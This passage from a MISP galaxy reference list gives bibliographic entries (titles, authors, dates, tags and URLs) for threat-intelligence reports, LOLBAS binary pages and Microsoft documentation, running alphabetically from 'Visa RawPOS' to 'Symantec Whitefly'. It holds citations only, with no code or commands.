Visa RawPOS March 2015

Visa. (2015, March). Visa Security Alert: "RawPOS" Malware Targeting Lodging Merchants. Retrieved October 6, 2017.

The tag is: misp-galaxy:references="Visa RawPOS March 2015"

Table 16013. Table References

Links

https://usa.visa.com/dam/VCOM/download/merchants/alert-rawpos.pdf

ESET Recon Snake Nest

Boutin, J. and Faou, M. (2018). Visiting the snake nest. Retrieved May 7, 2019.

The tag is: misp-galaxy:references="ESET Recon Snake Nest"

Table 16014. Table References

Links

https://recon.cx/2018/brussels/resources/slides/RECON-BRX-2018-Visiting-The-Snake-Nest.pdf

VB Microsoft

Microsoft. (n.d.). Visual Basic documentation. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="VB Microsoft"

Table 16015. Table References

Links

https://docs.microsoft.com/dotnet/visual-basic/

Wikipedia VBA

Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August 13, 2020.

The tag is: misp-galaxy:references="Wikipedia VBA"

Table 16016. Table References

Links

https://en.wikipedia.org/wiki/Visual_Basic_for_Applications

VB .NET Mar 2020

NET Team. (2020, March 11). Visual Basic support planned for .NET 5.0. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="VB .NET Mar 2020"

Table 16017. Table References

Links

https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/

VisualUiaVerifyNative.exe - LOLBAS Project

LOLBAS. (2021, September 26). VisualUiaVerifyNative.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="VisualUiaVerifyNative.exe - LOLBAS Project"

Table 16018. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/

Carbon Black HotCroissant April 2020

Knight, S. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020.

The tag is: misp-galaxy:references="Carbon Black HotCroissant April 2020"

Table 16019. Table References

Links

https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/

Offensive Security VNC Authentication Check

Offensive Security. (n.d.). VNC Authentication. Retrieved October 6, 2021.

The tag is: misp-galaxy:references="Offensive Security VNC Authentication Check"

Table 16020. Table References

Links

https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/

CheckPoint Volatile Cedar March 2015

Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021.

The tag is: misp-galaxy:references="CheckPoint Volatile Cedar March 2015"

Table 16021. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf

Microsoft Volt Typhoon May 2023

Microsoft Threat Intelligence. (2023, May 24). Volt Typhoon targets US critical infrastructure with living-off-the-land techniques. Retrieved July 27, 2023.

The tag is: misp-galaxy:references="Microsoft Volt Typhoon May 2023"

Table 16022. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/

VSDiagnostics.exe - LOLBAS Project

LOLBAS. (2023, July 12). VSDiagnostics.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="VSDiagnostics.exe - LOLBAS Project"

Table 16023. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics/

Vshadow.exe - LOLBAS Project

LOLBAS. (2023, September 6). Vshadow.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Vshadow.exe - LOLBAS Project"

Table 16024. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/

VSIISExeLauncher.exe - LOLBAS Project

LOLBAS. (2021, September 24). VSIISExeLauncher.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="VSIISExeLauncher.exe - LOLBAS Project"

Table 16025. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/

vsjitdebugger.exe - LOLBAS Project

LOLBAS. (2018, May 25). vsjitdebugger.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="vsjitdebugger.exe - LOLBAS Project"

Table 16026. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/

vsls-agent.exe - LOLBAS Project

LOLBAS. (2022, November 1). vsls-agent.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="vsls-agent.exe - LOLBAS Project"

Table 16027. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsls-agent/

vstest.console.exe - LOLBAS Project

LOLBAS. (2023, September 8). vstest.console.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="vstest.console.exe - LOLBAS Project"

Table 16028. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/vstest.console/

Vulnerability and Exploit Detector

Kanthak, S. (2016, July 20). Vulnerability and Exploit Detector. Retrieved February 3, 2017.

The tag is: misp-galaxy:references="Vulnerability and Exploit Detector"

Table 16029. Table References

Links

https://skanthak.homepage.t-online.de/sentinel.html

Kanthak Sentinel

Kanthak, S. (2016, July 20). Vulnerability and Exploit Detector. Retrieved February 3, 2017.

The tag is: misp-galaxy:references="Kanthak Sentinel"

Table 16030. Table References

Links

https://skanthak.homepage.t-online.de/sentinel.html

Technet MS14-068

Microsoft. (2014, November 18). Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.

The tag is: misp-galaxy:references="Technet MS14-068"

Table 16031. Table References

Links

https://technet.microsoft.com/en-us/library/security/ms14-068.aspx

vxunderground debug

vxunderground. (2021, June 30). VX-API. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="vxunderground debug"

Table 16032. Table References

Links

https://github.com/vxunderground/VX-API/tree/main/Anti%20Debug

Symantec W32.Duqu

Symantec Security Response. (2011, November). W32.Duqu: The precursor to the next Stuxnet. Retrieved September 17, 2015.

The tag is: misp-galaxy:references="Symantec W32.Duqu"

Table 16033. Table References

Links

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

Symantec W.32 Stuxnet Dossier

Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.

The tag is: misp-galaxy:references="Symantec W.32 Stuxnet Dossier"

Table 16034. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

w32.tidserv.g

Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January 14, 2022.

The tag is: misp-galaxy:references="w32.tidserv.g"

Table 16035. Table References

Links

https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2

Github W32Time Oct 2017

Lundgren, S. (2017, October 28). w32time. Retrieved March 26, 2018.

The tag is: misp-galaxy:references="Github W32Time Oct 2017"

Table 16036. Table References

Links

https://github.com/scottlundgren/w32time

Symantec Chernobyl W95.CIH

Yamamura, M. (2002, April 25). W95.CIH. Retrieved April 12, 2019.

The tag is: misp-galaxy:references="Symantec Chernobyl W95.CIH"

Table 16037. Table References

Links

https://web.archive.org/web/20190508170055/https://www.symantec.com/security-center/writeup/2000-122010-2655-99

Wab.exe - LOLBAS Project

LOLBAS. (2018, May 25). Wab.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Wab.exe - LOLBAS Project"

Table 16038. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Wab/

GitLab WakeOnLAN

Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February 17, 2021.

The tag is: misp-galaxy:references="GitLab WakeOnLAN"

Table 16039. Table References

Links

https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN

FireEye WannaCry 2017

Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.

The tag is: misp-galaxy:references="FireEye WannaCry 2017"

Table 16040. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html

BfV North Korea February 17 2024

Bundesamt für Verfassungsschutz. (2024, February 17). Warning of North Korean cyber threats targeting the Defense Sector. Retrieved February 26, 2024.

The tag is: misp-galaxy:references="BfV North Korea February 17 2024"

Table 16041. Table References

Links

https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2024-02-19-joint-cyber-security-advisory-englisch.pdf?blob=publicationFile&v=2

Trend Micro War of Crypto Miners

Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency Miners: A Battle for Resources. Retrieved April 6, 2021.

The tag is: misp-galaxy:references="Trend Micro War of Crypto Miners"

Table 16042. Table References

Links

https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html

Check Point Warzone Feb 2020

Harakhavik, Y. (2020, February 3). Warzone: Behind the enemy lines. Retrieved December 17, 2021.

The tag is: misp-galaxy:references="Check Point Warzone Feb 2020"

Table 16043. Table References

Links

https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/

Uptycs Warzone UAC Bypass November 2020

Mohanta, A. (2020, November 25). Warzone RAT comes with UAC bypass technique. Retrieved April 7, 2022.

The tag is: misp-galaxy:references="Uptycs Warzone UAC Bypass November 2020"

Table 16044. Table References

Links

https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique

Dragos WASSONITE

Dragos. (n.d.). WASSONITE. Retrieved January 20, 2021.

The tag is: misp-galaxy:references="Dragos WASSONITE"

Table 16045. Table References

Links

https://www.dragos.com/threat/wassonite/

NCC Group WastedLocker June 2020

Antenucci, S., Pantazopoulos, N., Sandee, M. (2020, June 23). WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group. Retrieved September 14, 2021.

The tag is: misp-galaxy:references="NCC Group WastedLocker June 2020"

Table 16046. Table References

Links

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

Sentinel Labs WastedLocker July 2020

Walter, J. (2020, July 23). WastedLocker Ransomware: Abusing ADS and NTFS File Attributes. Retrieved September 14, 2021.

The tag is: misp-galaxy:references="Sentinel Labs WastedLocker July 2020"

Table 16047. Table References

Links

https://www.sentinelone.com/labs/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/

Intezer Doki July 20

Fishbein, N., Kajiloti, M. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Intezer Doki July 20"

Table 16048. Table References

Links

https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/

Trend Micro Waterbear December 2019

Su, V. et al. (2019, December 11). Waterbear Returns, Uses API Hooking to Evade Security. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Trend Micro Waterbear December 2019"

Table 16049. Table References

Links

https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html

Symantec Waterbug Jun 2019

Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.

The tag is: misp-galaxy:references="Symantec Waterbug Jun 2019"

Table 16050. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments

ESET DazzleSpy Jan 2022

M.Léveillé, M., Cherepanov, A. (2022, January 25). Watering hole deploys new macOS malware, DazzleSpy, in Asia. Retrieved May 6, 2022.

The tag is: misp-galaxy:references="ESET DazzleSpy Jan 2022"

Table 16051. Table References

Links

https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/

win_wbadmin_delete_catalog

Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="win_wbadmin_delete_catalog"

Table 16052. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog

SecureWorks WannaCry Analysis

Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.

The tag is: misp-galaxy:references="SecureWorks WannaCry Analysis"

Table 16053. Table References

Links

https://www.secureworks.com/research/wcry-ransomware-analysis

Aleks Weapons Nov 2015

Nick Aleks. (2015, November 7). Weapons of a Pentester - Understanding the virtual & physical tools used by white/black hat hackers. Retrieved March 30, 2018.

The tag is: misp-galaxy:references="Aleks Weapons Nov 2015"

Table 16054. Table References

Links

https://www.youtube.com/watch?v=lDvf4ScWbcQ

NIST Web Bug

NIST Information Technology Laboratory. (n.d.). web bug. Retrieved March 22, 2023.

The tag is: misp-galaxy:references="NIST Web Bug"

Table 16055. Table References

Links

https://csrc.nist.gov/glossary/term/web_bug

Didier Stevens WebDAV Traffic

Stevens, D. (2017, November 13). WebDAV Traffic To Malicious Sites. Retrieved December 21, 2017.

The tag is: misp-galaxy:references="Didier Stevens WebDAV Traffic"

Table 16056. Table References

Links

https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/

Checkmarx Webhooks

Jossef Harush Kadouri. (2022, March 7). Webhook Party — Malicious packages caught exfiltrating data via legit webhook services. Retrieved July 20, 2023.

The tag is: misp-galaxy:references="Checkmarx Webhooks"

Table 16057. Table References

Links

https://medium.com/checkmarx-security/webhook-party-malicious-packages-caught-exfiltrating-data-via-legit-webhook-services-6e046b07d191

Push Security SaaS Attacks Repository Webhooks

Push Security. (2023, July 31). Webhooks. Retrieved August 4, 2023.

The tag is: misp-galaxy:references="Push Security SaaS Attacks Repository Webhooks"

Table 16058. Table References

Links

https://github.com/pushsecurity/saas-attacks/blob/main/techniques/webhooks/description.md

acunetix Server Secuirty

Acunetix. (n.d.). Web Server Security and Database Server Security. Retrieved July 26, 2018.

The tag is: misp-galaxy:references="acunetix Server Secuirty"

Table 16059. Table References

Links

https://www.acunetix.com/websitesecurity/webserver-security/

Microsoft Well Known SIDs Jun 2017

Microsoft. (2017, June 23). Well-known security identifiers in Windows operating systems. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft Well Known SIDs Jun 2017"

Table 16060. Table References

Links

https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems

PWC WellMess C2 August 2020

PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020.

The tag is: misp-galaxy:references="PWC WellMess C2 August 2020"

Table 16061. Table References

Links

https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html

Cofense Astaroth Sept 2018

Doaty, J., Garrett, P. (2018, September 10). We’re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="Cofense Astaroth Sept 2018"

Table 16062. Table References

Links

https://cofense.com/seeing-resurgence-demonic-astaroth-wmic-trojan/

Wevtutil Microsoft Documentation

Microsoft. (n.d.). wevtutil. Retrieved September 14, 2021.

The tag is: misp-galaxy:references="Wevtutil Microsoft Documentation"

Table 16063. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil

Microsoft wevtutil Oct 2017

Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018.

The tag is: misp-galaxy:references="Microsoft wevtutil Oct 2017"

Table 16064. Table References

Links

https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil

Wfc.exe - LOLBAS Project

LOLBAS. (2021, September 26). Wfc.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Wfc.exe - LOLBAS Project"

Table 16065. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/

Crowdstrike Downgrade

Bart Lenaerts-Bergman. (2023, March 14). What Are Downgrade Attacks?. Retrieved May 24, 2023.

The tag is: misp-galaxy:references="Crowdstrike Downgrade"

Table 16066. Table References

Links

https://www.crowdstrike.com/cybersecurity-101/attack-types/downgrade-attacks/

Chrome Extensions Definition

Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017.

The tag is: misp-galaxy:references="Chrome Extensions Definition"

Table 16067. Table References

Links

https://developer.chrome.com/extensions

StackExchange Hooks Jul 2012

Stack Exchange - Security. (2012, July 31). What are the methods to find hooked functions and APIs?. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="StackExchange Hooks Jul 2012"

Table 16068. Table References

Links

https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis

macOS APT Activity Bradley

Jaron Bradley. (2021, November 14). What does APT Activity Look Like on macOS?. Retrieved January 19, 2022.

The tag is: misp-galaxy:references="macOS APT Activity Bradley"

Table 16069. Table References

Links

https://themittenmac.com/what-does-apt-activity-look-like-on-macos/

okta

okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.

The tag is: misp-galaxy:references="okta"

Table 16070. Table References

Links

https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen

Norton Botnet

Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.

The tag is: misp-galaxy:references="Norton Botnet"

Table 16071. Table References

Links

https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html

Microsoft DLL

Microsoft. (2023, April 28). What is a DLL. Retrieved September 7, 2023.

The tag is: misp-galaxy:references="Microsoft DLL"

Table 16072. Table References

Links

https://learn.microsoft.com/troubleshoot/windows-client/deployment/dynamic-link-library

Cloudflare DNSamplficationDoS

Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Cloudflare DNSamplficationDoS"

Table 16073. Table References

Links

https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/

Amazon AWS VPC Guide

Amazon. (n.d.). What Is Amazon VPC?. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Amazon AWS VPC Guide"

Table 16074. Table References

Links

https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html

Cloudflare HTTPflood

Cloudflare. (n.d.). What is an HTTP flood DDoS attack?. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Cloudflare HTTPflood"

Table 16075. Table References

Links

https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/

Cloudflare NTPamplifciationDoS

Cloudflare. (n.d.). What is a NTP amplification attack?. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Cloudflare NTPamplifciationDoS"

Table 16076. Table References

Links

https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/

Microsoft Primary Refresh Token

Microsoft. (2022, September 9). What is a Primary Refresh Token?. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Microsoft Primary Refresh Token"

Table 16077. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token

Comparitech Replay Attack

Justin Schamotta. (2022, October 28). What is a replay attack?. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Comparitech Replay Attack"

Table 16078. Table References

Links

https://www.comparitech.com/blog/information-security/what-is-a-replay-attack/

Corero SYN-ACKflood

Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Corero SYN-ACKflood"

Table 16079. Table References

Links

https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html

Cloudflare SynFlood

Cloudflare. (n.d.). What is a SYN flood attack?. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Cloudflare SynFlood"

Table 16080. Table References

Links

https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/

Amazon VM

Microsoft. (n.d.). What is a virtual machine (VM)?. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Amazon VM"

Table 16081. Table References

Links

https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/

RedHat Webhooks

RedHat. (2022, June 1). What is a webhook?. Retrieved July 20, 2023.

The tag is: misp-galaxy:references="RedHat Webhooks"

Table 16082. Table References

Links

https://www.redhat.com/en/topics/automation/what-is-a-webhook

AWS System Manager

AWS. (2023, June 2). What is AWS System Manager?. Retrieved June 2, 2023.

The tag is: misp-galaxy:references="AWS System Manager"

Table 16083. Table References

Links

https://docs.aws.amazon.com/systems-manager/latest/userguide/what-is-systems-manager.html

Microsoft Azure Virtual Network Overview

Annamalai, N., Casey, C., Almeida, M., et al. (2019, June 18). What is Azure Virtual Network?. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Microsoft Azure Virtual Network Overview"

Table 16084. Table References

Links

https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview

CrowdStrike-BEC

Bart Lenaerts-Bergmans. (2023, March 10). What is Business Email Compromise?. Retrieved August 8, 2023.

The tag is: misp-galaxy:references="CrowdStrike-BEC"

Table 16085. Table References

Links

https://www.crowdstrike.com/cybersecurity-101/business-email-compromise-bec/

PAN DNS Tunneling

Palo Alto Networks. (n.d.). What Is DNS Tunneling?. Retrieved March 15, 2020.

The tag is: misp-galaxy:references="PAN DNS Tunneling"

Table 16086. Table References

Links

https://www.paloaltonetworks.com/cyberpedia/what-is-dns-tunneling

Proofpoint-spoof

Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.

The tag is: misp-galaxy:references="Proofpoint-spoof"

Table 16087. Table References

Links

https://www.proofpoint.com/us/threat-reference/email-spoofing

magnusviri emond Apr 2016

Reynolds, James. (2016, April 7). What is emond?. Retrieved September 10, 2019.

The tag is: misp-galaxy:references="magnusviri emond Apr 2016"

Table 16088. Table References

Links

http://www.magnusviri.com/Mac/what-is-emond.html

Microsoft - Azure AD Federation

Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020.

The tag is: misp-galaxy:references="Microsoft - Azure AD Federation"

Table 16089. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed

grsecurity official

grsecurity. (2017, December 12). What is grsecurity?. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="grsecurity official"

Table 16090. Table References

Links

https://grsecurity.net/

VDSO Aug 2005

Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020.

The tag is: misp-galaxy:references="VDSO Aug 2005"

Table 16091. Table References

Links

https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/

what_is_mmc

Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="what_is_mmc"

Table 16092. Table References

Links

https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console

Microsoft NET

Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.

The tag is: misp-galaxy:references="Microsoft NET"

Table 16093. Table References

Links

https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework

Pastebin EchoSec

Ciarniello, A. (2019, September 24). What is Pastebin and Why Do Hackers Love It?. Retrieved April 11, 2023.

The tag is: misp-galaxy:references="Pastebin EchoSec"

Table 16094. Table References

Links

https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it

Microsoft Protected View

Microsoft. (n.d.). What is Protected View?. Retrieved November 22, 2017.

The tag is: misp-galaxy:references="Microsoft Protected View"

Table 16095. Table References

Links

https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653

TechNet RPC

Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.

The tag is: misp-galaxy:references="TechNet RPC"

Table 16096. Table References

Links

https://technet.microsoft.com/en-us/library/cc787851.aspx

IOKit Fundamentals

Apple. (2014, April 9). What Is the I/O Kit?. Retrieved September 24, 2021.

The tag is: misp-galaxy:references="IOKit Fundamentals"

Table 16097. Table References

Links

https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html

Baeldung LD_PRELOAD

baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Baeldung LD_PRELOAD"

Table 16098. Table References

Links

https://www.baeldung.com/linux/ld_preload-trick-what-is

Microsoft VBScript

Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020.

The tag is: misp-galaxy:references="Microsoft VBScript"

Table 16099. Table References

Links

https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)

VEC

CloudFlare. (n.d.). What is vendor email compromise (VEC)?. Retrieved September 12, 2023.

The tag is: misp-galaxy:references="VEC"

Table 16100. Table References

Links

https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/#:~:text=Vendor%20email%20compromise%2C%20also%20referred

Proofpoint Vishing

Proofpoint. (n.d.). What Is Vishing?. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="Proofpoint Vishing"

Table 16101. Table References

Links

https://www.proofpoint.com/us/threat-reference/vishing

taxonomy_downgrade_att_tls

Alashwali, E. S., Rasmussen, K. (2019, January 26). What’s in a Downgrade? A Taxonomy of Downgrade Attacks in the TLS Protocol and Application Protocols Using TLS. Retrieved December 7, 2021.

The tag is: misp-galaxy:references="taxonomy_downgrade_att_tls"

Table 16102. Table References

Links

https://arxiv.org/abs/1809.05681

FireEye fxsst June 2011

Harbour, N. (2011, June 3). What the fxsst?. Retrieved November 17, 2020.

The tag is: misp-galaxy:references="FireEye fxsst June 2011"

Table 16103. Table References

Links

https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html

Krebs Capital One August 2019

Krebs, B. (2019, August 19). What We Can Learn from the Capital One Hack. Retrieved March 25, 2020.

The tag is: misp-galaxy:references="Krebs Capital One August 2019"

Table 16104. Table References

Links

https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/

Symantec ADS May 2009

Pravs. (2009, May 25). What you need to know about alternate data streams in windows? Is your Data secure? Can you restore that?. Retrieved March 21, 2018.

The tag is: misp-galaxy:references="Symantec ADS May 2009"

Table 16105. Table References

Links

https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore

BH Manul Aug 2016

Galperin, E., et al. (2016, August 4). When Governments Attack: State Sponsored Malware Attacks Against Activists, Lawyers, and Journalists. Retrieved May 23, 2018.

The tag is: misp-galaxy:references="BH Manul Aug 2016"

Table 16106. Table References

Links

https://www.blackhat.com/docs/us-16/materials/us-16-Quintin-When-Governments-Attack-State-Sponsored-Malware-Attacks-Against-Activists-Lawyers-And-Journalists.pdf

Dragos Heroku Watering Hole

Kent Backman. (2021, May 18). When Intrusions Don’t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.

The tag is: misp-galaxy:references="Dragos Heroku Watering Hole"

Table 16107. Table References

Links

https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/

SpectorOps Bifrost Kerberos macOS 2019

Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost. Retrieved October 6, 2021.

The tag is: misp-galaxy:references="SpectorOps Bifrost Kerberos macOS 2019"

Table 16108. Table References

Links

https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f

Palo Alto Brute Ratel July 2022

Harbison, M. and Renals, P. (2022, July 5). When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors. Retrieved February 1, 2023.

The tag is: misp-galaxy:references="Palo Alto Brute Ratel July 2022"

Table 16109. Table References

Links

https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/

Trend Micro When Phishing Starts from the Inside 2017

Chris Taylor. (2017, October 5). When Phishing Starts from the Inside. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Trend Micro When Phishing Starts from the Inside 2017"

Table 16110. Table References

Links

https://blog.trendmicro.com/phishing-starts-inside/

Booz Allen Hamilton

Booz Allen Hamilton. (n.d.). When The Lights Went Out. Retrieved October 22, 2019.

The tag is: misp-galaxy:references="Booz Allen Hamilton"

Table 16111. Table References

Links

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

Microsoft Where to use TxF

Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Microsoft Where to use TxF"

Table 16112. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx

Brining MimiKatz to Unix

Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Brining MimiKatz to Unix"

Table 16113. Table References

Links

https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf

Dell Lateral Movement

Carvey, H. (2014, September 2). Where you AT?: Indicators of lateral movement using at.exe on Windows 7 systems. Retrieved January 25, 2016.

The tag is: misp-galaxy:references="Dell Lateral Movement"

Table 16114. Table References

Links

http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/

Secureworks - AT.exe Scheduled Task

Carvey, H. (2014, September). Where You AT?: Indicators of Lateral Movement Using at.exe on Windows 7 Systems. Retrieved November 27, 2019.

The tag is: misp-galaxy:references="Secureworks - AT.exe Scheduled Task"

Table 16115. Table References

Links

https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems

Cybereason WhisperGate February 2022

Cybereason Nocturnus. (2022, February 15). Cybereason vs. WhisperGate and HermeticWiper. Retrieved March 10, 2022.

The tag is: misp-galaxy:references="Cybereason WhisperGate February 2022"

Table 16116. Table References

Links

https://www.cybereason.com/blog/cybereason-vs.-whispergate-wiper

RecordedFuture WhisperGate Jan 2022

Insikt Group. (2022, January 28). WhisperGate Malware Corrupts Computers in Ukraine. Retrieved March 31, 2023.

The tag is: misp-galaxy:references="RecordedFuture WhisperGate Jan 2022"

Table 16117. Table References

Links

https://www.recordedfuture.com/whispergate-malware-corrupts-computers-ukraine

Symantec Whitefly March 2019

